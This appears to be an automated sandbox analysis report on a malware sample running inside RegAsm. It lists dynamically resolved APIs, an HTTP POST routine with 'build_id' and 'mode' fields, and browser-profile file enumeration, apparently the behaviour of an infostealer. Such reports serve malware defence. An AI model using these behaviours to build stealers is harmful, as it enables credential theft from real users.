___scrt_release_startup_lock 81572->81573 81574 6cc6b082 81573->81574 81575 6cc6b07b 81573->81575 81578 6cc6b087 _configure_narrow_argv 81574->81578 81598 6cc6b341 IsProcessorFeaturePresent 81575->81598 81577 6cc6b080 81577->81557 81579 6cc6b095 _initialize_narrow_environment 81578->81579 81580 6cc6b092 81578->81580 81579->81577 81580->81557 81582 6cc6b20c ___scrt_fastfail 81581->81582 81583 6cc6b218 memset memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 81582->81583 81584 6cc6b302 ___scrt_fastfail 81583->81584 81584->81547 81585->81556 81586->81544 81587->81567 81589 6cc6af9e 81588->81589 81590 6cc6af9a 81588->81590 81591 6cc6b028 81589->81591 81593 6cc6afab ___scrt_release_startup_lock 81589->81593 81590->81570 81592 6cc6b1f7 ___scrt_fastfail 6 API calls 81591->81592 81594 6cc6b02f 81592->81594 81595 6cc6afb8 _initialize_onexit_table 81593->81595 81596 6cc6afd6 81593->81596 81595->81596 81597 6cc6afc7 _initialize_onexit_table 81595->81597 81596->81570 81597->81596 81598->81577 81599 6cc335a0 81600 6cc335c4 InitializeCriticalSectionAndSpinCount getenv 81599->81600 81601 6cc33846 __aulldiv 81599->81601 81603 6cc338fc strcmp 81600->81603 81613 6cc335f3 __aulldiv 81600->81613 81616 6cc6b320 5 API calls ___raise_securityfailure 81601->81616 81605 6cc33912 strcmp 81603->81605 81603->81613 81604 6cc338f4 81605->81613 81606 6cc335f8 QueryPerformanceFrequency 81606->81613 81607 6cc33622 _strnicmp 81608 6cc33944 _strnicmp 81607->81608 81607->81613 81611 6cc3395d 81608->81611 81608->81613 81609 6cc3376a QueryPerformanceCounter EnterCriticalSection 81612 6cc337b3 LeaveCriticalSection QueryPerformanceCounter EnterCriticalSection 81609->81612 81614 6cc3375c 81609->81614 81610 6cc33664 GetSystemTimeAdjustment 81610->81613 81612->81614 81615 6cc337fc LeaveCriticalSection 81612->81615 81613->81606 81613->81607 81613->81608 81613->81610 81613->81611 81613->81614 81614->81601 81614->81609 81614->81612 81614->81615 81615->81601 81615->81614 81616->81604 81617 6cc33060 ?Startup@TimeStamp@mozilla@ ?Now@TimeStamp@mozilla@@CA?AV12@_N ?InitializeUptime@mozilla@ 81622 6cc6ab2a 81617->81622 81621 6cc330db 81626 6cc6ae0c _crt_atexit _register_onexit_function 81622->81626 81624 6cc330cd 81625 6cc6b320 5 API calls ___raise_securityfailure 81624->81625 81625->81621 81626->81624 81627 6cc4c930 GetSystemInfo VirtualAlloc 81628 6cc4c9a3 GetSystemInfo 81627->81628 81629 6cc4c973 81627->81629 81631 6cc4c9b6 81628->81631 81632 6cc4c9d0 81628->81632 81643 6cc6b320 5 API calls ___raise_securityfailure 81629->81643 81631->81632 81634 6cc4c9bd 81631->81634 81632->81629 81635 6cc4c9d8 VirtualAlloc 81632->81635 81633 6cc4c99b 81634->81629 81636 6cc4c9c1 VirtualFree 81634->81636 81637 6cc4c9f0 81635->81637 81638 6cc4c9ec 81635->81638 81636->81629 81644 6cc6cbe8 GetCurrentProcess TerminateProcess 81637->81644 81638->81629 81643->81633 81645 6cc6b9c0 81646 6cc6b9ce dllmain_dispatch 81645->81646 81647 6cc6b9c9 81645->81647 81649 6cc6bef1 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 81647->81649 81649->81646 81650 4138e7 81651 4138f2 81650->81651 81652 401061 _EH_prolog 81651->81652 81653 4138fe 81652->81653 81654 6cc6b830 81655 6cc6b86e dllmain_crt_process_detach 81654->81655 81656 6cc6b83b 81654->81656 81658 6cc6b840 81655->81658 81657 6cc6b860 dllmain_crt_process_attach 81656->81657 81656->81658 81657->81658 81659 6cc6b8ae 81661 6cc6b8ba ___scrt_is_nonwritable_in_current_image 81659->81661 81660 6cc6b8e3 dllmain_raw 81662 6cc6b8fd dllmain_crt_dispatch 81660->81662 81663 6cc6b8c9 81660->81663 81661->81660 81661->81663 81664 6cc6b8de 81661->81664 81662->81663 81662->81664 81672 6cc4bed0 DisableThreadLibraryCalls LoadLibraryExW 81664->81672 81666 6cc6b91e 81667 6cc6b94a 81666->81667 81673 6cc4bed0 DisableThreadLibraryCalls LoadLibraryExW 81666->81673 81667->81663 81668 6cc6b953 dllmain_crt_dispatch 81667->81668 81668->81663 81670 6cc6b966 dllmain_raw 81668->81670 81670->81663 81671 6cc6b936 dllmain_crt_dispatch dllmain_raw 81671->81667 81672->81666 81673->81671

                                                                            Executed Functions

                                                                            Function 00417645 Relevance: 207.0, APIs: 114, Strings: 4, Instructions: 490libraryloaderCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 555 417645-41764c 556 417652-417a25 GetProcAddress * 43 555->556 557 417a2a-417ac9 LoadLibraryA * 9 555->557 556->557 558 417b39-417b40 557->558 559 417acb-417b34 GetProcAddress * 5 557->559 560 417b46-417bf4 GetProcAddress * 8 558->560 561 417bf9-417c00 558->561 559->558 560->561 562 417c70-417c77 561->562 563 417c02-417c6b GetProcAddress * 5 561->563 564 417d02-417d09 562->564 565 417c7d-417cfd GetProcAddress * 6 562->565 563->562 566 417dd9-417de0 564->566 567 417d0f-417dd4 GetProcAddress * 9 564->567 565->564 568 417e50-417e57 566->568 569 417de2-417e4b GetProcAddress * 5 566->569 567->566 570 417e82-417e89 568->570 571 417e59-417e7d GetProcAddress * 2 568->571 569->568 572 417eb4-417ebb 570->572 573 417e8b-417eaf GetProcAddress * 2 570->573 571->570 574 417ec1-417f9b GetProcAddress * 10 572->574 575 417fa0-417fa7 572->575 573->572 574->575 576 418000-418007 575->576 577 417fa9-417ffb GetProcAddress * 4 575->577 578 418009-418016 GetProcAddress 576->578 579 41801b-418022 576->579 577->576 578->579 580 418024-418076 GetProcAddress * 4 579->580 581 41807b-418082 579->581 580->581 582 418095 581->582 583 418084-418090 GetProcAddress 581->583 583->582
                                                                            APIs
                                                                            • GetProcAddress.KERNEL32(76210000,00416AAC), ref: 00417659
                                                                            • GetProcAddress.KERNEL32 ref: 00417670
                                                                            • GetProcAddress.KERNEL32 ref: 00417687
                                                                            • GetProcAddress.KERNEL32 ref: 0041769E
                                                                            • GetProcAddress.KERNEL32 ref: 004176B5
                                                                            • GetProcAddress.KERNEL32 ref: 004176CC
                                                                            • GetProcAddress.KERNEL32 ref: 004176E3
                                                                            • GetProcAddress.KERNEL32 ref: 004176FA
                                                                            • GetProcAddress.KERNEL32 ref: 00417711
                                                                            • GetProcAddress.KERNEL32 ref: 00417728
                                                                            • GetProcAddress.KERNEL32 ref: 0041773F
                                                                            • GetProcAddress.KERNEL32 ref: 00417756
                                                                            • GetProcAddress.KERNEL32 ref: 0041776D
                                                                            • GetProcAddress.KERNEL32 ref: 00417784
                                                                            • GetProcAddress.KERNEL32 ref: 0041779B
                                                                            • GetProcAddress.KERNEL32 ref: 004177B2
                                                                            • GetProcAddress.KERNEL32 ref: 004177C9
                                                                            • GetProcAddress.KERNEL32 ref: 004177E0
                                                                            • GetProcAddress.KERNEL32 ref: 004177F7
                                                                            • GetProcAddress.KERNEL32 ref: 0041780E
                                                                            • GetProcAddress.KERNEL32 ref: 00417825
                                                                            • GetProcAddress.KERNEL32 ref: 0041783C
                                                                            • GetProcAddress.KERNEL32 ref: 00417853
                                                                            • GetProcAddress.KERNEL32 ref: 0041786A
                                                                            • GetProcAddress.KERNEL32 ref: 00417881
                                                                            • GetProcAddress.KERNEL32 ref: 00417898
                                                                            • GetProcAddress.KERNEL32 ref: 004178AF
                                                                            • GetProcAddress.KERNEL32 ref: 004178C6
                                                                            • GetProcAddress.KERNEL32 ref: 004178DD
                                                                            • GetProcAddress.KERNEL32 ref: 004178F4
                                                                            • GetProcAddress.KERNEL32 ref: 0041790B
                                                                            • GetProcAddress.KERNEL32 ref: 00417922
                                                                            • GetProcAddress.KERNEL32 ref: 00417939
                                                                            • GetProcAddress.KERNEL32 ref: 00417950
                                                                            • GetProcAddress.KERNEL32 ref: 00417967
                                                                            • GetProcAddress.KERNEL32 ref: 0041797E
                                                                            • GetProcAddress.KERNEL32 ref: 00417995
                                                                            • GetProcAddress.KERNEL32 ref: 004179AC
                                                                            • GetProcAddress.KERNEL32 ref: 004179C3
                                                                            • GetProcAddress.KERNEL32 ref: 004179DA
                                                                            • GetProcAddress.KERNEL32 ref: 004179F1
                                                                            • GetProcAddress.KERNEL32 ref: 00417A08
                                                                            • GetProcAddress.KERNEL32 ref: 00417A1F
                                                                            • LoadLibraryA.KERNEL32(00416AAC,?,00000040,00000064,0041366A,00412D12,?,0000002C,00000064,004135E9,00413626,?,00000024,00000064,Function_000135AC,00413295), ref: 00417A30
                                                                            • LoadLibraryA.KERNEL32 ref: 00417A41
                                                                            • LoadLibraryA.KERNEL32 ref: 00417A52
                                                                            • LoadLibraryA.KERNEL32 ref: 00417A63
                                                                            • LoadLibraryA.KERNEL32 ref: 00417A74
                                                                            • LoadLibraryA.KERNEL32 ref: 00417A85
                                                                            • LoadLibraryA.KERNEL32 ref: 00417A96
                                                                            • LoadLibraryA.KERNEL32 ref: 00417AA7
                                                                            • LoadLibraryA.KERNEL32(dbghelp.dll), ref: 00417AB7
                                                                            • GetProcAddress.KERNEL32(751E0000), ref: 00417AD2
                                                                            • GetProcAddress.KERNEL32 ref: 00417AE9
                                                                            • GetProcAddress.KERNEL32 ref: 00417B00
                                                                            • GetProcAddress.KERNEL32 ref: 00417B17
                                                                            • GetProcAddress.KERNEL32 ref: 00417B2E
                                                                            • GetProcAddress.KERNEL32(73F70000), ref: 00417B4D
                                                                            • GetProcAddress.KERNEL32 ref: 00417B64
                                                                            • GetProcAddress.KERNEL32 ref: 00417B7B
                                                                            • GetProcAddress.KERNEL32 ref: 00417B92
                                                                            • GetProcAddress.KERNEL32 ref: 00417BA9
                                                                            • GetProcAddress.KERNEL32 ref: 00417BC0
                                                                            • GetProcAddress.KERNEL32 ref: 00417BD7
                                                                            • GetProcAddress.KERNEL32 ref: 00417BEE
                                                                            • GetProcAddress.KERNEL32(753A0000), ref: 00417C09
                                                                            • GetProcAddress.KERNEL32 ref: 00417C20
                                                                            • GetProcAddress.KERNEL32 ref: 00417C37
                                                                            • GetProcAddress.KERNEL32 ref: 00417C4E
                                                                            • GetProcAddress.KERNEL32 ref: 00417C65
                                                                            • GetProcAddress.KERNEL32(76310000), ref: 00417C84
                                                                            • GetProcAddress.KERNEL32 ref: 00417C9B
                                                                            • GetProcAddress.KERNEL32 ref: 00417CB2
                                                                            • GetProcAddress.KERNEL32 ref: 00417CC9
                                                                            • GetProcAddress.KERNEL32 ref: 00417CE0
                                                                            • GetProcAddress.KERNEL32 ref: 00417CF7
                                                                            • GetProcAddress.KERNEL32(76910000), ref: 00417D16
                                                                            • GetProcAddress.KERNEL32 ref: 00417D2D
                                                                            • GetProcAddress.KERNEL32 ref: 00417D44
                                                                            • GetProcAddress.KERNEL32 ref: 00417D5B
                                                                            • GetProcAddress.KERNEL32 ref: 00417D72
                                                                            • GetProcAddress.KERNEL32 ref: 00417D89
                                                                            • GetProcAddress.KERNEL32 ref: 00417DA0
                                                                            • GetProcAddress.KERNEL32 ref: 00417DB7
                                                                            • GetProcAddress.KERNEL32 ref: 00417DCE
                                                                            • GetProcAddress.KERNEL32(75B30000), ref: 00417DE9
                                                                            • GetProcAddress.KERNEL32 ref: 00417E00
                                                                            • GetProcAddress.KERNEL32 ref: 00417E17
                                                                            • GetProcAddress.KERNEL32 ref: 00417E2E
                                                                            • GetProcAddress.KERNEL32 ref: 00417E45
                                                                            • GetProcAddress.KERNEL32(75670000), ref: 00417E60
                                                                            • GetProcAddress.KERNEL32 ref: 00417E77
                                                                            • GetProcAddress.KERNEL32(76AC0000), ref: 00417E92
                                                                            • GetProcAddress.KERNEL32 ref: 00417EA9
                                                                            • GetProcAddress.KERNEL32(6F500000), ref: 00417EC8
                                                                            • GetProcAddress.KERNEL32 ref: 00417EDF
                                                                            • GetProcAddress.KERNEL32 ref: 00417EF6
                                                                            • GetProcAddress.KERNEL32 ref: 00417F0D
                                                                            • GetProcAddress.KERNEL32 ref: 00417F24
                                                                            • GetProcAddress.KERNEL32 ref: 00417F3B
                                                                            • GetProcAddress.KERNEL32 ref: 00417F52
                                                                            • GetProcAddress.KERNEL32 ref: 00417F69
                                                                            • GetProcAddress.KERNEL32(HttpQueryInfoA), ref: 00417F7F
                                                                            • GetProcAddress.KERNEL32(InternetSetOptionA), ref: 00417F95
                                                                            • GetProcAddress.KERNEL32(75AE0000), ref: 00417FB0
                                                                            • GetProcAddress.KERNEL32 ref: 00417FC7
                                                                            • GetProcAddress.KERNEL32 ref: 00417FDE
                                                                            • GetProcAddress.KERNEL32 ref: 00417FF5
                                                                            • GetProcAddress.KERNEL32(76300000), ref: 00418010
                                                                            • GetProcAddress.KERNEL32(6D1A0000), ref: 0041802B
                                                                            • GetProcAddress.KERNEL32 ref: 00418042
                                                                            • GetProcAddress.KERNEL32 ref: 00418059
                                                                            • GetProcAddress.KERNEL32 ref: 00418070
                                                                            • GetProcAddress.KERNEL32(6CFB0000,SymMatchString), ref: 0041808A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AddressProc$LibraryLoad
                                                                            • String ID: HttpQueryInfoA$InternetSetOptionA$SymMatchString$dbghelp.dll
                                                                            • API String ID: 2238633743-951535364
                                                                            • Opcode ID: e99d2a3dd66da67205f3114fc9aaaece5a66dc5c732b58a81b65daf475131747
                                                                            • Instruction ID: 5d64eb95f993e10cfffcd180ca7930ca50f89af3c14b7aa20224d1cce3759a27
                                                                            • Opcode Fuzzy Hash: e99d2a3dd66da67205f3114fc9aaaece5a66dc5c732b58a81b65daf475131747
                                                                            • Instruction Fuzzy Hash: 0042D97E811620EFEB929FA0FD48A653BB3F70AB01B147439FA0586231D7364865EF54
                                                                            Function 0040514C Relevance: 54.9, APIs: 21, Strings: 10, Instructions: 640networkstringmemoryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1160 40514c-40521b _EH_prolog call 40f95a call 403a54 call 40f923 * 5 call 40fb4d InternetOpenA StrCmpCA 1177 40521d 1160->1177 1178 40521f-405222 1160->1178 1177->1178 1179 4058d8-4058fe InternetCloseHandle call 40fb4d call 406242 1178->1179 1180 405228-4053a6 call 410b5c call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40fa28 call 40f9e1 call 40f98e * 2 InternetConnectA 1178->1180 1189 405900-40592d call 40f997 call 40fa9c call 40f9e1 call 40f98e 1179->1189 1190 405932-40599f call 410a94 * 2 call 40f98e * 4 call 401061 call 40f98e 1179->1190 1180->1179 1260 4053ac-4053dd HttpOpenRequestA 1180->1260 1189->1190 1261 4053e3-4053e5 1260->1261 1262 4058cf-4058d2 InternetCloseHandle 1260->1262 1263 4053e7-4053f7 InternetSetOptionA 1261->1263 1264 4053fd-405875 call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 4020f3 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fb4d lstrlenA call 40fb4d lstrlenA GetProcessHeap HeapAlloc call 40fb4d lstrlenA call 40fb4d memcpy call 40fb4d lstrlenA call 40fb4d * 2 lstrlenA memcpy call 40fb4d lstrlenA call 40fb4d HttpSendRequestA 1261->1264 1262->1179 1263->1264 1423 4058b1-4058c6 InternetReadFile 1264->1423 1424 405877-40587c 1423->1424 1425 4058c8-4058c9 InternetCloseHandle 1423->1425 1424->1425 1426 40587e-4058ac call 40fa9c call 40f9e1 call 40f98e 1424->1426 1425->1262 1426->1423
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 00405151
                                                                              • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                              • Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
                                                                              • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                                              • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                                              • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                                              • Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                                              • Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004051FC
                                                                            • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040539B
                                                                            • HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 004053D2
                                                                            • lstrlenA.KERNEL32(00000000,00000000,?,?,00000000,?,",00000000,?,mode,00000000,?,00000000,?,00425AC8,00000000), ref: 004057CC
                                                                            • lstrlenA.KERNEL32(00000000), ref: 004057DD
                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004057E7
                                                                            • HeapAlloc.KERNEL32(00000000), ref: 004057EE
                                                                            • lstrlenA.KERNEL32(00000000), ref: 004057FF
                                                                            • memcpy.MSVCRT ref: 00405810
                                                                            • lstrlenA.KERNEL32(00000000), ref: 00405821
                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 0040583A
                                                                            • memcpy.MSVCRT ref: 00405843
                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405856
                                                                            • HttpSendRequestA.WININET(?,00000000,00000000), ref: 0040586A
                                                                            • InternetReadFile.WININET(?,?,000000C7,?), ref: 004058BE
                                                                            • InternetCloseHandle.WININET(?), ref: 004058C9
                                                                            • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 004053F7
                                                                              • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                              • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                              • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                              • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                              • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                              • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                              • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                            • InternetCloseHandle.WININET(?), ref: 004058D2
                                                                            • InternetCloseHandle.WININET(?), ref: 004058DB
                                                                            • StrCmpCA.SHLWAPI(?), ref: 00405213
                                                                              • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Internetlstrlen$lstrcpy$H_prolog$CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileOptionProcessReadSend
                                                                            • String ID: "$"$"$($------$------$------$------$build_id$mode
                                                                            • API String ID: 2237346945-1447386369
                                                                            • Opcode ID: 0ad7276aa294dbd547a4d96f96a942a7d0334b21d4d2b34b5b54ff39ca66d9ac
                                                                            • Instruction ID: d7c5970f0897ada52bebf96924e878e3ecce30d18c8aa08c600bdb313c44272c
                                                                            • Opcode Fuzzy Hash: 0ad7276aa294dbd547a4d96f96a942a7d0334b21d4d2b34b5b54ff39ca66d9ac
                                                                            • Instruction Fuzzy Hash: 51424EB190414DEADB11EBE1C956BEEBBB8AF18308F50017EE505B3582DA781B4CCB65
                                                                            Function 0040C679 Relevance: 44.7, APIs: 19, Strings: 6, Instructions: 924fileCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 2024 40c679-40c72b _EH_prolog call 40f923 call 40fa28 call 40fa9c call 40f9e1 call 40f98e * 2 call 40f923 * 2 call 40fb4d FindFirstFileA 2043 40c772-40c778 2024->2043 2044 40c72d-40c76d call 40f98e * 3 call 401061 call 40f98e 2024->2044 2045 40c77a-40c78e StrCmpCA 2043->2045 2074 40d3d4-40d3f9 call 40f98e * 2 2044->2074 2047 40d374-40d386 FindNextFileA 2045->2047 2048 40c794-40c7a8 StrCmpCA 2045->2048 2047->2045 2052 40d38c-40d3d1 FindClose call 40f98e * 3 call 401061 call 40f98e 2047->2052 2048->2047 2050 40c7ae-40c83a call 40f997 call 40fa28 call 40fa9c * 2 call 40f9e1 call 40f98e * 3 2048->2050 2091 40c840-40c859 call 40fb4d StrCmpCA 2050->2091 2092 40c99f-40ca34 call 40fa9c * 4 call 40f9e1 call 40f98e * 3 2050->2092 2052->2074 2097 40c8ff-40c99a call 40fa9c * 4 call 40f9e1 call 40f98e * 3 2091->2097 2098 40c85f-40c8fa call 40fa9c * 4 call 40f9e1 call 40f98e * 3 2091->2098 2141 40ca3a-40ca5c call 40f98e call 40fb4d StrCmpCA 2092->2141 2097->2141 2098->2141 2150 40ca62-40ca76 StrCmpCA 2141->2150 2151 40cc7b-40cc90 StrCmpCA 2141->2151 2150->2151 2152 40ca7c-40cbf5 call 40f923 call 410b5c call 40fa9c call 40fa28 call 40fa9c call 40fa28 call 40f9e1 call 40f98e * 5 call 40fb4d * 2 call 40f923 call 40fa9c * 2 call 40f9e1 call 40f98e * 2 call 40f95a call 40618b 2150->2152 2153 40cc92-40ccf5 call 4010b1 call 40f95a * 3 call 40c27b 2151->2153 2154 40cd05-40cd1a StrCmpCA 2151->2154 2362 40cc44-40cc76 call 40fb4d call 40fb14 call 40fb4d call 40f98e * 2 2152->2362 2363 40cbf7-40cc3f call 40f95a call 4010b1 call 414437 call 40f98e 2152->2363 2214 40ccfa-40cd00 2153->2214 2155 40cd96-40cdb1 call 40f95a call 410cdd 2154->2155 2156 40cd1c-40cd33 call 40fb4d StrCmpCA 2154->2156 2178 40ce37-40ce4c StrCmpCA 2155->2178 2179 40cdb7-40cdba 2155->2179 2167 40d2e3-40d2ea 2156->2167 2168 40cd39-40cd3c 2156->2168 2175 40d364-40d36f call 40fb14 * 2 2167->2175 2176 40d2ec-40d359 call 40f95a * 2 call 40f923 call 4010b1 call 40c679 2167->2176 2168->2167 2172 40cd42-40cd94 call 4010b1 call 40f95a * 2 2168->2172 2225 40ce15-40ce27 call 40f95a call 406737 2172->2225 2175->2047 2239 40d35e 2176->2239 2191 40d0d0-40d0e5 StrCmpCA 2178->2191 2192 40ce52-40cf43 call 40f923 call 410b5c call 40fa9c call 40fa28 call 40fa9c call 40fa28 call 40f9e1 call 40f98e * 5 call 40fb4d * 2 CopyFileA 2178->2192 2179->2167 2186 40cdc0-40ce12 call 4010b1 call 40f95a call 40f923 2179->2186 2186->2225 2191->2167 2195 40d0eb-40d1dc call 40f923 call 410b5c call 40fa9c call 40fa28 call 40fa9c call 40fa28 call 40f9e1 call 40f98e * 5 call 40fb4d * 2 CopyFileA 2191->2195 2305 40d027-40d040 call 40fb4d StrCmpCA 2192->2305 2306 40cf49-40d021 call 4010b1 call 40f95a * 3 call 406e2a call 4010b1 call 40f95a * 3 call 407893 2192->2306 2307 40d2c0-40d2d2 call 40fb4d DeleteFileA call 40fb14 2195->2307 2308 40d1e2-40d2ba call 4010b1 call 40f95a * 3 call 4071c6 call 4010b1 call 40f95a * 3 call 4074e2 2195->2308 2214->2167 2246 40ce2c-40ce32 2225->2246 2239->2175 2246->2167 2318 40d0b1-40d0c3 call 40fb4d DeleteFileA call 40fb14 2305->2318 2319 40d042-40d0ab call 4010b1 call 40f95a * 3 call 407ec7 2305->2319 2306->2305 2334 40d2d7 2307->2334 2308->2307 2341 40d0c8-40d0cb 2318->2341 2319->2318 2340 40d2da-40d2de call 40f98e 2334->2340 2340->2167 2341->2340 2362->2151 2363->2362
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 0040C67E
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                              • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                              • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                              • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                              • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                              • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                              • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                              • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                              • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                            • FindFirstFileA.KERNEL32(00000000,?,00425B7B,00425B7A,00000000,?,00425CC4,?,?,00425B77,?,?,00000000), ref: 0040C71F
                                                                            • StrCmpCA.SHLWAPI(?,00425CC8,?,?,00000000), ref: 0040C786
                                                                            • StrCmpCA.SHLWAPI(?,00425CCC,?,?,00000000), ref: 0040C7A0
                                                                            • StrCmpCA.SHLWAPI(00000000,Opera GX,00000000,?,?,?,00425CD0,?,?,00425B7E,?,?,00000000), ref: 0040C851
                                                                              • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
